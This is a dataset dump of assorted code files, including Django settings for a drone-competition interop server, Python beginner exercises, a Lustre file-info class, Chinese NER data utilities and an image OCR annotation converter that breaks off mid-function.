+{"seq_id":"594513122","text":"\"\"\"\nDjango settings for the interop server.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.11/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'anp#d4lgo3u6j&6dc3+8sn!t+l(6hcuspm^&3(yq10evfwbh+1'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nALLOWED_HOSTS = ['*']\n\n# Public IP addresses given access to Django Debug Toolbar\n# Add your IP here, if not localhost.\nINTERNAL_IPS = ['127.0.0.1']\n\n# Application definition\nINSTALLED_APPS = (\n 'auvsi_suas',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.staticfiles',\n 'pipeline',\n) # yapf: disable\n\nMIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.gzip.GZipMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.http.ConditionalGetMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'pipeline.middleware.MinifyHTMLMiddleware',\n 'auvsi_suas.views.middleware.LoggingMiddleware',\n) # yapf: disable\n\nROOT_URLCONF = 'server.urls'\nWSGI_APPLICATION = 'server.wsgi.application'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n# SECURITY WARNING: change the database superuser password!\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'auvsi_suas_db',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'CONN_MAX_AGE': None,\n 'HOST': 'interop-db',\n 'PORT': '5432',\n 'TEST': {\n 'NAME': 'test_auvsi_suas_db',\n },\n }\n}\n\n# Caches\n# https://docs.djangoproject.com/en/1.11/topics/cache\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'TIMEOUT': 10,\n 'KEY_PREFIX': 'suas',\n }\n}\n\n# Logging\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format':\n '%(asctime)s %(levelname)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(asctime)s %(levelname)s %(module)s %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n },\n 'loggers': {\n 'py.warnings': {\n 'handlers': ['file'],\n },\n 'django': {\n 'handlers': ['file'],\n },\n 'django.request': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 'propagate': True,\n },\n 'django.security': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 
'propagate': True,\n },\n 'auvsi_suas.views': {\n 'handlers': ['file'],\n 'level': 'WARNING',\n 'propagate': True,\n },\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/New_York'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'auvsi_suas/frontend'),\n]\n\nSTATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'pipeline.finders.PipelineFinder',\n)\n\nPIPELINE = {\n 'STYLESHEETS': {\n 'styles': {\n 'source_filenames': (\n 'third_party/bootstrap/bootstrap.min.css',\n 'app.css',\n 'components/team-status.css',\n 'pages/mission-dashboard.css',\n 'pages/mission-list.css',\n 'pages/odlc-review.css',\n 'pages/evaluate-teams.css',\n ),\n 'output_filename': 'styles.css',\n },\n },\n 'JAVASCRIPT': {\n 'scripts': {\n 'source_filenames': (\n 'third_party/jquery/jquery.min.js',\n 'third_party/bootstrap/bootstrap.min.js',\n 'third_party/angularjs/angular.min.js',\n 'third_party/angularjs/angular-resource.min.js',\n 'third_party/angularjs/angular-route.min.js',\n 'app.js',\n 'components/navigation.js',\n 'components/backend-service.js',\n 'components/team-status-controller.js',\n 'pages/gps-conversion-controller.js',\n 'pages/mission-dashboard-controller.js',\n 'pages/mission-list-controller.js',\n 'pages/odlc-review-controller.js',\n 'pages/evaluate-teams-controller.js',\n ),\n 'output_filename': 'scripts.js',\n },\n },\n} # yapf: disable\n\n# User uploaded files\nMEDIA_URL = '/media/'\nMEDIA_ROOT = '/var/www/media'\n\n# Send images with sendfile.\nSENDFILE_BACKEND = 'sendfile.backends.nginx'\nSENDFILE_ROOT = MEDIA_ROOT\nSENDFILE_URL = MEDIA_URL\n\n# Login URL\nLOGIN_URL = '/admin/login/?next=/'\n\n# Migrations\nMIGRATION_MODULES = {\n 'auvsi_suas.models': 'auvsi_suas.models.migrations',\n} # yapf: disable\n\n# Custom test runner.\nTEST_RUNNER = 'auvsi_suas.test_runner.AuvsiSuasTestRunner'\n","sub_path":"server/server/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
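+# Sketch of how application code consumes the CACHES block in the settings
+# record above: django.core.cache exposes the 'default' alias, entries are
+# namespaced by the 'suas' KEY_PREFIX, and they expire after the configured
+# 10-second TIMEOUT. The key name is an arbitrary example.
+from django.core.cache import cache
+
+cache.set("team_status", "active")  # stored under the 'suas' key prefix
+value = cache.get("team_status")    # returns None once the timeout lapses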
+{"seq_id":"399015641","text":"class Televisao:\n def __init__(self,marca,tipo):\n self.ligada = False\n self.marca = marca\n self.tipo = tipo\n self.canal = 2\n\n def power(self):\n if self.ligada:\n self.ligada = False\n else:\n self.ligada = True\n\n def status(self):\n if self.ligada:\n return \"A televisão da {marca} {tipo} está ligada\".format(marca = self.marca, tipo = self.tipo)\n else:\n return \"A televisão da {marca} {tipo} está desligada\".format(marca = self.marca, tipo = self.tipo)\n\n\n def aumentar_canal(self):\n if self.ligada:\n self.canal += 1\n\n\n def diminuir_canal(self):\n if self.ligada:\n self.canal -= 1\n\n \nif __name__ == \"__main__\":\n televisao = Televisao(\"Samsung\",\"QLED\")\n televisao.power()\n print(televisao.status())\n\n televisao.power()\n print(televisao.status())\n\n\n televisao.power()\n televisao.aumentar_canal()\n televisao.aumentar_canal()\n televisao.diminuir_canal()\n\n print(\"A televisão está no canal: {}\".format(televisao.canal))\n\n","sub_path":"app_python/televisao.py","file_name":"televisao.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"250205669","text":"a = eval(input('Please enter the decimal number: '))\r\nb = a % 2\r\nc = a // 2\r\nd = ''\r\nd = str(b) + d\r\nwhile c > 0:\r\n b = c % 2\r\n c = c // 2\r\n d = str(b) + d\r\nprint(d)","sub_path":"078.py","file_name":"078.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"340610393","text":"from math import floor\ndef ndiamond(n):\n a = 1\n i = 1\n k = 1\n j = (n-1)/2\n while i < n:\n print((j-1)*\" \"),\n print(a*a)\n i = i + 2\n a = a*10 + 1\n j = j -1 \n print(a*a)\n c = int(floor(a/10))\n while i > 1:\n print((k-1)*\" \"),\n print(c*c)\n c = int(floor(c/10))\n i = i - 2\n k = k + 1\n \n \nndiamond()","sub_path":"Assignments/Python_Assignment3/Codes/Q4b.py","file_name":"Q4b.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"521618498","text":"import os\nimport pylut\nimport stat\nimport hashlib\n\nclass FSItem( object ):\n \"\"\"\n Encapsulate file information such as name, absolute path,\n mountpoint, stat info (from os.lstat), stripe info, etc.\n \"\"\"\n\n # stat info key names\n statinfo_keys = ( 'mode', 'ino', 'dev', 'nlink', 'uid',\n 'gid', 'size', 'atime', 'mtime', 'ctime' )\n\n # md5 checksum blocksize (assume bigger is better, faster)\n md5_blocksize = 512 * 1024 * 1024\n\n def __init__( self, path, absname=None, mountpoint=None ):\n \"\"\"\n Can instantiate with either a full path only OR pass in all three arguments.\n :param path str: either a full path or just a name\n :param absname str: OPTIONAL the absolute path to the file, if not provided, an attempt will be made to look it up\n :param mountpoint str: OPTIONAL path to the mountpoint, if not provided, an attempt will be made to look it up\n \"\"\"\n self.name = os.path.basename( path )\n self.absname = absname\n self.mountpoint = mountpoint\n self._statinfo = None #os.lstat\n self._stripeinfo = None #pylut.getstripeinfo\n self._fid = None #pylut.path2fid\n self._checksum = None #hashlib.md5().hexdigest\n if self.absname is None:\n self.absname = os.path.abspath( path )\n if self.mountpoint is None:\n self.mountpoint = getmountpoint( self.absname )\n\n\n def __repr__( self ):\n return '<{0} {1} {2}>'.format( self.__class__.__name__, self._fid, self.absname )\n\n\n def __str__( self ):\n return self.absname\n\n\n def fid( self ):\n if self._fid is None:\n self._fid = pylut.path2fid( self.absname )\n return self._fid\n\n\n def stat( self ):\n \"\"\"\n Return file stat information, getting it if needed\n \"\"\"\n # Store statinfo as a local dict\n if self._statinfo is None:\n st = os.lstat( self.absname )\n self._statinfo = {}\n for x in self.statinfo_keys:\n k = 'st_{0}'.format( x )\n self._statinfo[ x ] = getattr( st, k )\n return self._statinfo\n\n\n def stripeinfo( self ):\n \"\"\"\n Return stripe information, getting it if needed\n \"\"\"\n if self._stripeinfo is None:\n self._stripeinfo = pylut.getstripeinfo( self.absname )\n return self._stripeinfo\n\n\n def checksum( self ):\n if self._checksum is None:\n if self.exists():\n cksum = hashlib.md5()\n with open( self.absname, 'rb' ) as f:\n for chunk in iter( lambda: f.read( self.md5_blocksize ), b'' ):\n cksum.update( chunk )\n self._checksum = cksum.hexdigest()\n return self._checksum\n \n\n\n def exists( self ):\n try:\n self.stat()\n except ( OSError ) as e:\n if e.errno == 2: \n return False\n raise e\n return True\n \n\n def is_dir( self ):\n return stat.S_ISDIR( self.mode )\n\n\n def is_file( self ):\n return stat.S_ISREG( self.mode )\n\n\n def is_symlink( self ):\n return stat.S_ISLNK( self.mode )\n\n\n def compare( self, other, attrnames ):\n \"\"\" Compare (one or more) attributes (given by attrnames)\n Returns a tuple of True/False values for each attribute\n Result tuple has the same order as attrnames\n \"\"\"\n return tuple( getattr( self, x ) == getattr( other, x ) for x in attrnames )\n\n\n def update( self ):\n \"\"\"\n Force update of all transient information \n (stripeinfo, statinfo, fid, checksum)\n \"\"\"\n self._statinfo = None\n self._stripeinfo = None\n self._fid = None\n self._checksum = None\n\n\n def __getattr__( self, name ):\n # allow easy stat information lookup\n if name in self.statinfo_keys:\n return self.stat()[ name ]\n # allow easy stripeinfo lookup\n if name.startswith( 'stripe' ):\n return getattr( self.stripeinfo(), name[6:] )\n raise 
AttributeError('{0} not found in {1}'.format( \n name, self.__class__.__name__) )\n\n\ndef getmountpoint( path ): \n path = os.path.realpath( os.path.abspath( path ) )\n while path != os.path.sep:\n if os.path.ismount( path ):\n return path\n path = os.path.abspath( os.path.join( path, os.pardir ) )\n return path\n\n\nif __name__ == '__main__':\n raise UserWarning( 'Cmdline not supported' )\n","sub_path":"fsitem.py","file_name":"fsitem.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
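+# Standalone sketch of the chunked-MD5 pattern used by FSItem.checksum() above;
+# reading in fixed-size blocks keeps memory bounded for large files. The 1 MiB
+# block size here is illustrative, not the class constant.
+import hashlib
+
+def md5sum(path, blocksize=1 << 20):
+    cksum = hashlib.md5()
+    with open(path, 'rb') as f:
+        for chunk in iter(lambda: f.read(blocksize), b''):
+            cksum.update(chunk)
+    return cksum.hexdigest()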
+{"seq_id":"140072268","text":"import os\nfrom datetime import datetime\n\nLOG_LOCATION = os.path.join(*[os.getcwd(),'errorLog.txt'])\n\ndef log_error(e):\n f = open(LOG_LOCATION,'a')\n f.write('------------------------------------\\n')\n f.write('Time: ' + str(datetime.now()) + \"\\n\")\n f.write(str(e) + \"\\n\")\n f.write('------------------------------------\\n')\n f.close()\n","sub_path":"libs/error_logger.py","file_name":"error_logger.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533483258","text":"import sys, pickle, os, random\nimport numpy as np\n\n## tags, BIO\n# tag2label = {\"O\": 0,\n# \"B-PER\": 1, \"I-PER\": 2,\n# \"B-LOC\": 3, \"I-LOC\": 4,\n# \"B-ORG\": 5, \"I-ORG\": 6,\n# \"B-TIME\":7, \"I-TIME\":8,\n# \"B-ROLE\":9, \"I-ROLE\":10,\n# \"B-CRIME\":11, \"I-CRIME\":12,\n# \"B-LAW\":13, \"I-LAW\":14\n# }\n# tag2label = {\"O\": 0,\n# \"B-PER\": 1, \"I-PER\": 2,\n# \"B-LOC\": 3, \"I-LOC\": 4,\n# \"B-ORG\": 5, \"I-ORG\": 6\n# }\ntag2label = {\"O\":0,\n \"B-ALG\":1,\"I-ALG\":2,\n \"B-MDL\":3,\"I-MDL\":4,\n \"B-TECH\":5,\"I-TECH\":6,\n \"B-OPQ\":7,\"I-OPQ\":8,\n \"B-CHAR\":9,\"I-CHAR\":10,\n \"B_TECH\":11}\n\ndef read_corpus(corpus_path):#读data,返回char label组成的data\n \"\"\"\n read corpus and return the list of samples\n :param corpus_path:\n :return: data,list形式。文件下的所有句子以及对应的label,以(句子,label)(句子,label)形式的list返回\n \"\"\"\n data = []\n with open(corpus_path, encoding='utf-8') as fr:\n lines = fr.readlines()\n sent_, tag_ = [], []\n for line in lines:\n if line != '\\n':\n try:\n [char, label] = line.strip().split(' ')#字,B-LABEL\n sent_.append(char)#句子中所有的字\n tag_.append(label)#句子中所有的label\n except Exception as e:\n print(e)\n pass\n else:\n data.append((sent_, tag_))#data:句子和label两个list组成的tuple加入到datalist中\n sent_, tag_ = [], []\n return data\n\n\ndef vocab_build(vocab_path, corpus_path, min_count):\n \"\"\"\n\n :param vocab_path:\n :param corpus_path:\n :param min_count:\n :return:\n \"\"\"\n data = read_corpus(corpus_path)\n word2id = {}\n for sent_, tag_ in data:\n for word in sent_:\n if word.isdigit():\n word = ''\n elif ('\\u0041' <= word <='\\u005a') or ('\\u0061' <= word <='\\u007a'):\n word = ''\n if word not in word2id:\n word2id[word] = [len(word2id)+1, 1]\n else:\n word2id[word][1] += 1\n low_freq_words = []\n for word, [word_id, word_freq] in word2id.items():\n if word_freq < min_count and word != '' and word != '':\n low_freq_words.append(word)\n for word in low_freq_words:\n del word2id[word]\n\n new_id = 1\n for word in word2id.keys():\n word2id[word] = new_id\n new_id += 1\n word2id[''] = new_id\n word2id[''] = 0\n\n print(len(word2id))\n with open(vocab_path, 'wb') as fw:\n pickle.dump(word2id, fw)\n\n#将句子里的每个字返回其对应在字典里的下标值\n#eg:['于', '大', '宝', '的', '进', '球', '帮', '助', '中', '国', '队', '在', '长', '沙', '贺', '龙', '体', '育', '中', '心', '以', '1', '-', '0', '的', '比', '分', '获', '胜']\n# [273, 55, 1071, 8, 430, 1912, 1092, 7, 52, 21, 569, 73, 14, 2065, 2405, 600, 922, 451, 52, 237, 134, 94, 3904, 94, 8, 805, 786, 725, 831]\ndef sentence2id(sent, word2id):\n \"\"\"\n\n :param sent:--句子\n :param word2id:--字典,每个字对应一个数字\n :return:sentence_id--一句话中每个字对应的字典下标\n \"\"\"\n sentence_id = []\n for word in sent:\n #word是数字的情况,贴NUM标签\n if word.isdigit():\n word = ''\n #word是a-z或者A-Z的情况,贴ENG标签\n elif ('\\u0041' <= word <= '\\u005a') or ('\\u0061' <= word <= '\\u007a'):\n word = ''\n #word不在字典里\n if word not in word2id:\n word = ''\n sentence_id.append(word2id[word])\n #返回字典里的下标\n return sentence_id\n\n#返回一个word2id的dict,长度为3905,eg:{‘字1’:2201,‘字2’:599...}\ndef read_dictionary(vocab_path):\n \"\"\"\n\n :param vocab_path:\n :return:\n \"\"\"\n vocab_path = os.path.join(vocab_path)\n with open(vocab_path, 'rb') as fr:\n word2id = pickle.load(fr)\n print('vocab_size:', len(word2id))#list_size:3905\n return word2id\n\n#生成一个随机的(3905,300)维array\n\ndef random_embedding(vocab, embedding_dim):\n \"\"\"\n :param vocab:\n :param embedding_dim:\n :return:\n \"\"\"\n #从均匀分布中抽取样本。样品在半开区间均匀分布 (包括低,但不包括高)。\n embedding_mat = np.random.uniform(-0.25, 0.25, (len(vocab), 
embedding_dim))\n embedding_mat = np.float32(embedding_mat)#shape(3905,300)\n return embedding_mat\n\n\ndef pad_sequences(sequences, pad_mark=0):\n \"\"\"\n\n :param sequences:\n :param pad_mark:\n :return:扩充或截断的句子序列以及min(len(seq), max_len)\n \"\"\"\n #29\n #获取sequences中所有list的最长长度\n max_len = max(map(lambda x : len(x), sequences))#135\n seq_list, seq_len_list = [], []\n for seq in sequences:\n seq = list(seq)\n seq_ = seq[:max_len] + [pad_mark] * max(max_len - len(seq), 0)\n seq_list.append(seq_)#sequences中扩充好的list\n seq_len_list.append(min(len(seq), max_len))#句子长度和最大长度的min\n return seq_list, seq_len_list\n\n#返回字典下标seqs,以及标签labels\n#eg:seqs[[273, 55, 1071, 8, 430, 1912, 1092, 7, 52, 21, 569, 73, 14, 2065, 2405, 600, 922, 451, 52, 237, 134, 94, 3904, 94, 8, 805, 786, 725, 831]]\n#labels [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\ndef batch_yield(data, batch_size, vocab, tag2label, shuffle=False):\n \"\"\"\n\n :param data:--traindata\n :param batch_size:default64\n :param vocab:--word2id\n :param tag2label:--tag2label\n :param shuffle:\n :return:seqs--batch_size句子中每句话每个字对应的字典下标\n labels--batch_size句子中每句话每个字的标签\n \"\"\"\n if shuffle:\n random.shuffle(data)\n\n seqs, labels = [], []\n for (sent, tag_) in data:\n sent_ = sentence2id(sent, vocab)#返回句子中每个字在字典中的下标\n label_ = [tag2label[tag] for tag in tag_]#一句话中每个字的标签\n\n if len(seqs) == batch_size:\n yield seqs, labels\n seqs, labels = [], []\n\n seqs.append(sent_)\n labels.append(label_)\n\n if len(seqs) != 0:\n yield seqs, labels\n\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
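+# Worked example of pad_sequences() from the data.py record above: every
+# sequence in a batch is right-padded with pad_mark up to the batch maximum,
+# and the true lengths are returned alongside (input values are illustrative).
+seq_list, seq_len_list = pad_sequences([[273, 55, 1071], [8, 430]], pad_mark=0)
+# seq_list     == [[273, 55, 1071], [8, 430, 0]]
+# seq_len_list == [3, 2]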
+{"seq_id":"301818296","text":"\n\"\"\"\n\n给 PaddleOCR 用,前面是坐标和图片都变换;这里图像不变,坐标不变 \n\n\n将阿里OCR 的识别结果(图片和标注)转换成 icdar2015 格式 (注意:它的文本是含 utf8 bom 的)\n\n给 mmocr 训练用。格式是 icdar2015 的格式,文件夹的组织方式是按照 mmocr 的要求创建的\n\n\"\"\"\n\n\n\"\"\"\n\n! unzip ./GD500.zip -d DB/datasets\n\nicdar2015 文本检测数据集\n标注格式: x1,y1,x2,y2,x3,y3,x4,y4,text\n\n其中, x1,y1为左上角坐标,x2,y2为右上角坐标,x3,y3为右下角坐标,x4,y4为左下角坐标。 \n\n### 表示text难以辨认。\n\"\"\"\n\n\n\n\nimport random\nfrom pathlib import Path\nimport os\nimport glob\nimport base64\nfrom importlib.resources import path\nimport math\nimport numpy as np\nimport cv2\nimport json\nimport decimal\nimport datetime\nfrom pickletools import uint8\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n elif isinstance(o, datetime.datetime):\n return str(o)\n super(DecimalEncoder, self).default(o)\n\n\ndef save_json(filename, dics):\n with open(filename, 'w', encoding='utf-8') as fp:\n json.dump(dics, fp, indent=4, cls=DecimalEncoder, ensure_ascii=False)\n fp.close()\n\n\ndef load_json(filename):\n with open(filename, encoding='utf-8') as fp:\n js = json.load(fp)\n fp.close()\n return js\n\n# convert string to json\n\n\ndef parse(s):\n return json.loads(s, strict=False)\n\n# convert dict to string\n\n\ndef string(d):\n return json.dumps(d, cls=DecimalEncoder, ensure_ascii=False)\n\n\ndef transform(points, M):\n # points 算出四个点变换后移动到哪里了\n # points = np.array([[word_x, word_y], # 左上\n # [word_x + word_width, word_y], # 右上\n # [word_x + word_width, word_y + word_height], # 右下\n # [word_x, word_y + word_height], # 左下\n # ])\n # add ones\n ones = np.ones(shape=(len(points), 1))\n\n points_ones = np.hstack([points, ones])\n\n # transform points\n transformed_points = M.dot(points_ones.T).T\n\n transformed_points_int = np.round(\n transformed_points, decimals=0).astype(np.int32) # 批量四舍五入\n \n return transformed_points_int\n\n\ndef cutPoly(img, pts):\n # img = cv2.imdecode(np.fromfile('./t.png', dtype=np.uint8), -1)\n # pts = np.array([[10,150],[150,100],[300,150],[350,100],[310,20],[35,10]])\n\n ## (1) Crop the bounding rect\n rect = cv2.boundingRect(pts)\n x,y,w,h = rect\n croped = img[y:y+h, x:x+w].copy()\n\n ## (2) make mask\n pts = pts - pts.min(axis=0)\n\n mask = np.zeros(croped.shape[:2], np.uint8)\n cv2.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv2.LINE_AA)\n\n ## (3) do bit-op\n dst = cv2.bitwise_and(croped, croped, mask=mask)\n\n ## (4) add the white background\n bg = np.ones_like(croped, np.uint8)*255\n cv2.bitwise_not(bg,bg, mask=mask)\n dst2 = bg+ dst\n\n\n # cv2.imwrite(\"croped.png\", croped)\n # cv2.imwrite(\"mask.png\", mask)\n # cv2.imwrite(\"dst.png\", dst)\n # cv2.imwrite(\"dst2.png\", dst2)\n\n return dst2\n\n\n\nif __name__ == \"__main__\":\n\n # 验证原版的文本标记框\n # im = './train_images/img_1.jpg'\n # gt = './train_gts/gt_img_1.txt'\n\n # 验证自已生成的标记框\n im = './icdar2015_aliocr/imgs/training/img_1.jpg'\n gt = './icdar2015_aliocr/annotations/training/gt_img_1.txt'\n\n if os.path.exists(gt):\n\n items = []\n reader = open(gt, 'r', encoding='utf-8-sig').readlines()\n for line in reader:\n item = {}\n parts = line.strip().split(',')\n label = parts[-1]\n if 'TD' in gt and label == '1':\n label = '###'\n line = [i.strip('\\ufeff').strip('\\xef\\xbb\\xbf') for i in parts]\n if 'icdar' in gt:\n poly = np.array(list(map(float, line[:8]))).reshape(\n (-1, 2)).tolist()\n else:\n num_points = math.floor((len(line) - 1) / 2) * 2\n poly = np.array(list(map(float, line[:num_points]))).reshape(\n (-1, 2)).tolist()\n item['poly'] 
= poly\n item['text'] = label\n # 多边形是用一个个的点表示的,起点连接第二个点,第二个连接第三个 ... 最后一点连接起点,构成一个闭合的区域\n item['points'] = poly\n # 此标记表示文字模糊不可辨认,文本框的标记是不可靠的\n item['ignore'] = True if label == '###' else False\n items.append(item)\n\n img = cv2.imdecode(np.fromfile(im, dtype=np.uint8), -1)\n # DBNet 原版代码只能处理彩图,所以统一处理成彩图\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n for i in range(len(items)):\n poly = items[i]['poly']\n poly = np.array(poly)\n poly = poly.astype(np.int32)\n\n #cv2.fillPoly(img, pts=[ poly ], color=(0, 0, 255))\n\n b = random.randint(0, 255) # 用来生成[a,b]之间的随意整数,包括两个边界值。\n g = random.randint(0, 255)\n r = random.randint(0, 255)\n\n # 只画线,不填充 # 就是画线,从起点连到第二个点 ... 最后一个点连到第一个点\n cv2.polylines(img, [poly], isClosed=True,\n color=(b, g, r), thickness=1)\n\n #cv2.imwrite(\"poly.jpg\", img)\n\n # cv2.imshow(\"poly\", img)\n # cv2.waitKey()\n\n # 开始转换\n\n out_dir = 'icdar2015_aliocr'\n\n # https://help.aliyun.com/document_detail/294540.html 阿里云ocr结果字段定义\n # prism-wordsInfo 里的 angle 文字块的角度,这个角度只影响width和height,当角度为-90、90、-270、270,width和height的值需要自行互换\n\n dir_json = './data/json' # '/yingedu/www/ocr_server/data/json'\n dir_img = './data/img' # '/yingedu/www/ocr_server/data/img'\n\n train_list = []\n train_list_txt_path = os.path.join(out_dir, 'train_list.txt')\n\n g_count = 1\n\n json_paths = glob.glob('{}/*.json'.format(dir_json), recursive=True)\n\n for json_path in json_paths:\n\n base = Path(json_path).stem\n\n img_path = os.path.join(dir_img, '{}.txt'.format(base))\n\n if not os.path.exists(img_path): # 没有相应的图片,可能被删除了\n continue\n\n jsn = load_json(json_path)\n\n with open(img_path, \"r\", encoding=\"utf-8\") as fp:\n imgdata = fp.read()\n imgdata = base64.b64decode(imgdata)\n imgdata = np.frombuffer(imgdata, np.uint8)\n img = cv2.imdecode(imgdata, cv2.IMREAD_UNCHANGED)\n\n # cv2.imshow('img', img)\n # cv2.waitKey(0)\n\n if len(img.shape) != 3: # 转彩图\n img_color = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) # DBNet 原版只能处理彩图,这里转一下\n\n else:\n img_color = img.copy()\n\n img_color_origin = img_color.copy()\n img_color_origin2 = img_color.copy()\n\n\n # 生成1000 张一模一样的图\n for i in range(1, 1000+1):\n\n num_img = i\n\n img_name = \"img_{}.jpg\".format(num_img)\n gt_name = \"gt_img_{}.txt\".format(num_img)\n\n gt_txt_list = []\n\n train_list.append(img_name)\n # num_img += 1\n\n img_path = os.path.join(out_dir, 'imgs', 'training', img_name)\n img_gt_path = os.path.join(\n out_dir, 'annotations', 'training', gt_name)\n\n cv2.imwrite(img_path, img)\n\n wordsInfo = jsn['prism_wordsInfo']\n for j in range(len(wordsInfo)):\n jo = wordsInfo[j]\n word = jo[\"word\"]\n # prism-wordsInfo 里的 angle 文字块的角度,这个角度只影响width和height,当角度为-90、90、-270、270,width和height的值需要自行互换\n angle = jo['angle']\n \n img_color = img_color_origin.copy()\n\n word_x = jo['x']\n word_y = jo['y']\n word_width = jo['width']\n word_height = jo['height']\n\n if abs(angle) == 90 or abs(angle) == 270:\n word_width = jo['height']\n word_height = jo['width']\n elif angle != 0:\n\n # 变换前画出绿框,方便追踪点的前后变化\n # img_color = cv2.rectangle(img_color, (word_x, word_y), (\n # word_x + word_width, word_y + word_height), (0, 255, 0), 2) # 矩形的左上角, 矩形的右下角\n\n # cv2.imshow(\"green\", img_color)\n # cv2.waitKey(0)\n\n # 变换前的多边形蓝框\n points = np.array([\n [word_x, word_y], # 左上\n [word_x + word_width, word_y], # 右上\n [word_x + word_width, word_y + word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n\n # # cv2.fillPoly(img_color, pts=[points], color=(255, 0, 0)) # 填充\n # cv2.polylines(img_color, [points], 
isClosed=True, color=(\n # 255, 0, 0), thickness=1) # 只画线,不填充\n\n # cv2.imshow(\"polys\", img_color)\n # cv2.waitKey(0)\n\n # 获取图像的维度,并计算中心\n (h, w) = img_color.shape[:2]\n (cX, cY) = (w // 2, h // 2)\n\n # - (cX,cY): 旋转的中心点坐标\n # - 180: 旋转的度数,正度数表示逆时针旋转,而负度数表示顺时针旋转。\n # - 1.0:旋转后图像的大小,1.0原图,2.0变成原来的2倍,0.5变成原来的0.5倍\n # 1° = π/180弧度 1 弧度 = 180 / 3.1415926 // 0.0190033 是Mathematica 算出来的弧度,先转换成角度 // -0.0190033 * (180 / 3.1415926)\n M = cv2.getRotationMatrix2D((cX, cY), angle, 1.0)\n img_color = cv2.warpAffine(img_color, M, (w, h))\n img_color_transform = img_color.copy()\n\n # cv2.imshow(\"after trans\", img_color)\n # cv2.waitKey(0)\n\n # https://docs.opencv.org/2.4/doc/tutorials/imgproc/imgtrans/warp_affine/warp_affine.html # 原理\n # https://stackoverflow.com/questions/30327659/how-can-i-remap-a-point-after-an-image-rotation # How can I remap a point after an image rotation?\n # 如何得到移动后的坐标点\n\n # points 算出四个点变换后移动到哪里了\n points = np.array([[word_x, word_y], # 左上\n # 右上\n [word_x + word_width, word_y],\n [word_x + word_width, word_y + \\\n word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n # add ones\n ones = np.ones(shape=(len(points), 1))\n\n points_ones = np.hstack([points, ones])\n\n # transform points\n transformed_points = M.dot(points_ones.T).T\n\n transformed_points_int = np.round(\n transformed_points, decimals=0).astype(np.int32) # 批量四舍五入\n\n 